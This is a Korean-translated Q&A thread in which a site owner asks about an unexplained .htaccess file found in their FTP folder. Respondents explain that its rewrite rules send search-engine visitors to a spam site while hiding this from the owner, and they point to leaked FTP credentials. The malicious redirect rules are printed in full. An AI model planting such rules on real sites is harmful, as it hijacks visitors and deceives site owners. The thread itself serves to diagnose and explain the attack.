의심스러운 .htaccess 파일


20

이것은 내 FTP 폴더 중 하나에 업로드되었습니다. 나는 아파치에 익숙하지 않지만 여전히 궁금하다. 누군가이 파일이 커밋하려고하는 어떤 종류의 별다른 행동을 말해 줄 수 있는가? 감사!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]

1
좋은! (방법의 악한 분류 ...)은 기본적으로 SPAMMER.info로 검색 엔진에서 귀하의 사이트에오고 모두를 복용하고 리디렉션
KPWINC

이 일이 나에게 한 번 일어났다. .htaccess내 사이트에 추가 된 파일의 상단에는 약 40 개의 빈 줄이 있었으므로 더 혼란 스러웠습니다.
TRiG

답변:


15

검색 엔진에서 온 사용자를 마지막 사이트로 보냅니다 SPAMMER.info( 실제 사이트의 질문 내역 참조 ).

그것은에서 숨길 시도에서 추천을 찾습니다 당신 은 가능성이 검색 엔진을 통해 사이트에 액세스하지 않기 때문에. 즉, URL로 직접 이동하면 모든 것이 정상으로 보입니다. 그러나 검색 엔진을 통해 들어 오면 리디렉션됩니다.

참고 : 웹 크롤러 는 적어도 구글 봇 이 리퍼러 헤더를 설정 하지 않기 때문에 영향을 미치지 않습니다.


8

검색 엔진 사용자가 사이트의 모든 페이지를 방문 할 때마다 .info 스팸 사이트로 리디렉션됩니다.

매우 열악합니다. 일반적으로 주소를 입력하기 만하면 아무 문제가 없습니다.


1
리퍼러를보고 있기 때문에 검색 엔진을 통해 발생하는 클릭이 리디렉션되지 않습니까?

Google의 링크에도 영향을 미치지 않습니까? 예를 들어 Google에서 OP의 사이트를 검색하고 클릭하면 Google에서 온 이후 리디렉션됩니까?

예, 검색 엔진의 링크 (내 답변에서 말했듯이)는 검색 엔진 크롤러 / 봇이 아닙니다 . 이 답변은 업데이트되었으므로 이제 정확합니다. 원래 이것은 봇에만 적용됨을 나타냅니다.
Michael Haren

1

더 추가하려면-아마도 ftp 자격 증명이 유출되었을 것입니다. 아마도 당신은 filezilla / total commander 등에 저장했을 것입니다. ftp 계정에 로그온하거나, 악성 자바 스크립트를 index.php / html에 첨부하거나 비슷한 재 작성 파일을 넣는 악성 코드가 많이 있습니다.


이 문제에 직면하고 있습니다. 다른 .htaccess 파일이 수정 된 다음날 내부 서버 오류가 발생합니다.
vnix27
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.